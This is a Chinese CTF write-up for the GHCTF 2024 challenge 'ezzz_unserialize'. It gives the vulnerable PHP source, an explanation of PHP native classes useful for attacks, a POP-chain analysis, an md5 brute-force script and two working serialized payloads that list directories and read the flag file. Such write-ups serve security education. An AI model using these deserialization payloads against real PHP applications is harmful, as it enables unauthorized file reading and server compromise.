[GHCTF 2024 新生赛]ezzz_unserialize

源码：

/**
 * @Author: hey
 * @message: Patience is the key in life,I think you'll be able to find vulnerabilities in code audits.
 * Have fun and Good luck!!!
 */
error_reporting(0);
class Sakura{
    public $apple;
    public $strawberry;
    public function __construct($a){
        $this -> apple = $a;
    }
    function __destruct()
    {
        echo $this -> apple;
    }
    public function __toString()
    {
        $new = $this -> strawberry;
        return $new();
    }

}

class NoNo {
    private $peach;

    public function __construct($string) {
        $this -> peach = $string;
    }

    public function __get($name) {
        $var = $this -> $name;
        $var[$name]();
    }
}

class BasaraKing{
    public $orange;
    public $cherry;
    public $arg1;
    public function __call($arg1,$arg2){
        $function = $this -> orange;
        return $function();
    }
    public function __get($arg1)
    {
        $this -> cherry -> ll2('b2');
    }

}

class UkyoTachibana{
    public $banana;
    public $mangosteen;

    public function __toString()
    {
        $long = @$this -> banana -> add();
        return $long;
    }
    public function __set($arg1,$arg2)
    {
        if($this -> mangosteen -> tt2)
        {
            echo "Sakura was the best!!!";
        }
    }
}

class E{
    public $e;
    public function __get($arg1){
        array_walk($this, function ($Monday, $Tuesday) {
            $Wednesday = new $Tuesday($Monday);
            foreach($Wednesday as $Thursday){
                echo ($Thursday.'
');
            }
        });
    }
}

class UesugiErii{
    protected $coconut;

    protected function addMe() {
        return "My time with Sakura was my happiest time".$this -> coconut;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}
class Heraclqs{
    public $grape;
    public $blueberry;
    public function __invoke(){
        if(md5(md5($this -> blueberry)) == 123) {
            return $this -> grape -> hey;
        }
    }
}

class MaiSakatoku{
    public $Carambola;
    private $Kiwifruit;

    public function __set($name, $value)
    {
        $this -> $name = $value;
        if ($this -> Kiwifruit = "Sakura"){
            strtolower($this-> Carambola);
        }
    }
}

if(isset($_POST['GHCTF'])) {
    unserialize($_POST['GHCTF']);
} else {
    highlight_file(__FILE__);
}

array_walk函数

array_walk() 函数对数组中的每个元素应用用户自定义函数。

原生类的利用

一.可遍历目录类

DirectoryIterator
FilesystemIterator
GlobIterator 与上面略不同，该类可以通过模式匹配来寻找文件路径。

二.可读取文件类

SplFileObject 在此函数中，URL 可作为文件名，不过也要受到allow_url_fopen影响。

二.文件系统相关扩展

finfo 该类的构造函数finfo::__construct — 别名 finfo_open(),也可以读取文件。

pop链

E::__get -> Heraclqs::__invoke -> Sakura::__toString -> Sakura::__destruct
Heraclqs::__invoke中有一个弱比较

    public function __invoke(){
        if(md5(md5($this -> blueberry)) == 123) {
            return $this -> grape -> hey;
        }
    }

爆破以下即可

import hashlib
import itertools
import string

for i in itertools.product(string.printable, repeat=3):
    s = ''.join(i)
    s1 = hashlib.md5(s.encode()).hexdigest()
    s2 = hashlib.md5(s1.encode()).hexdigest()
    if s2[:3] == '123':
        print(s)

playload1：

class Sakura{
	public $apple;
	public $strawberry;
    // function __destruct()
    // {
    //     echo $this -> apple;
    // }
    // public function __toString()
    // {
    //     $new = $this -> strawberry;
    //     return $new();
    // }
}

class E{
    public $e;
    // public function __get($arg1){
    //     array_walk($this, function ($Monday, $Tuesday) {
    //         $Wednesday = new $Tuesday($Monday);
    //         foreach($Wednesday as $Thursday){
    //             echo ($Thursday.'
');
    //         }
    //     });
    // }
}

class Heraclqs{
    public $grape;
    public $blueberry;
    // public function __invoke(){
    //     if(md5(md5($this -> blueberry)) == 123) {
    //         return $this -> grape -> hey;
    //     }
    // }
}

$a1=new E;
$a1->FilesystemIterator='/';

$a2=new Heraclqs;
$a2->blueberry='LLh';
$a2->grape=$a1;

$a3=new Sakura;
$a3->strawberry=$a2;

$a4=new Sakura;
$a4->apple=$a3;

$s=serialize($a4);
echo $s;
?>
//O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:18:"FilesystemIterator";s:1:"/";}s:9:"blueberry";s:3:"LLh";}}s:10:"strawberry";N;}

palyload2：

class Sakura{
	public $apple;
	public $strawberry;
    // function __destruct()
    // {
    //     echo $this -> apple;
    // }
    // public function __toString()
    // {
    //     $new = $this -> strawberry;
    //     return $new();
    // }
}

class E{
    public $e;
    // public function __get($arg1){
    //     array_walk($this, function ($Monday, $Tuesday) {
    //         $Wednesday = new $Tuesday($Monday);
    //         foreach($Wednesday as $Thursday){
    //             echo ($Thursday.'
');
    //         }
    //     });
    // }
}

class Heraclqs{
    public $grape;
    public $blueberry;
    // public function __invoke(){
    //     if(md5(md5($this -> blueberry)) == 123) {
    //         return $this -> grape -> hey;
    //     }
    // }
}

$a1=new E;
$a1->SplFileObject='/1_ffffffflllllagggggg';

$a2=new Heraclqs;
$a2->blueberry='LLh';
$a2->grape=$a1;

$a3=new Sakura;
$a3->strawberry=$a2;

$a4=new Sakura;
$a4->apple=$a3;

$s=serialize($a4);
echo $s;
?>
//O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:13:"SplFileObject";s:22:"/1_ffffffflllllagggggg";}s:9:"blueberry";s:3:"LLh";}}s:10:"strawberry";N;}